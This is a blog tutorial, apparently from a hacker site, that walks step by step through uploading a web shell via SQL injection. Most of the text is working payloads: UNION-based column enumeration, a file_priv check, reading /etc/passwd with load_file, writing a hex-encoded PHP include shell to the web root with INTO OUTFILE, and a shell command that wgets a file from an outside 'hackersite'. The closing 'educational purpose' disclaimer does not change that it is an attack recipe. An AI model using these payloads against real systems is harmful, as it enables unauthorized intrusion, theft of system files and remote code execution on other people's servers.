How to Upload Shell Via Sql Injection

Asalamualaikum all my Friends today Malik Ubi will show you How to upload shell via Sql Injection

• Example I have a target with Sql Vulnerable Lets Inject it

 "http://examplesite.com/index.php?id=5"

 First we should know number of columns where we
will inject our code. We will  use "order by" command to find it.

http://examplesite.php?id=5 order by 1,2,3,4,5,6,7,8--

Ok it stop at '8' ... and I use "UNION SELECT" and got
number '5'
if we want to load or write we must check file
privilege... if we see 'Y' it mean we have permision to
load and write. this how to check file_priv

http://examplesite.php?id=-5+UNION+SELECT
+1,2,3,4,file_priv,6,7,8+from+mysql.user--

next we will try to load a file from directory
.
http://examplesite.php?id=-5+UNION+SELECT
+1,2,3,4,load_file('/etc/passwd'),6,7,8--
or you can convert into hex like this

http://examplesite.php?id=-5+UNION+SELECT
+1,2,3,4,load_file
(0x2f6574632f706173737764),6,7,8--

and we will see result of 'etc/passwd' it contains some
code like "root:x:0:0: or anything like that

 Next we must found the directory, many site show
the directory in the error page.. but some web not show
it. for example I got this directory '/var/www/site.com/
config.php' .

Now I will try to upload my shell on this directory
try to write and into outfile to upload my shell, this is
what I want to upload

:<?include($_GET["cmd']);?>

but
before I upload it I will convert it into hex it look like
this after converting :
3c3f696e636c75646528245f4745545b22636d64225d
293b3f3e

http://examplesite.php?id=-5+UNION+SELECT
+1,2,3,4,0x3c3f696e636c75646528245f4745545b
22636d64225d293b3f3e,6,7,8+INTO+OUTFILE+'/
var/www/site/shell.php'--

and bingo we uploaded our shell and open the shell

http://examplesite.com/shell.php?cmd=wget http://
hackersite/malik.txt

Hope you Liked my tutorial but it was just for Educational purpose don't do any illegal activity I am not responsible for that...


Tutorial by: Mαℓïк Цвï

Newer Post Older Post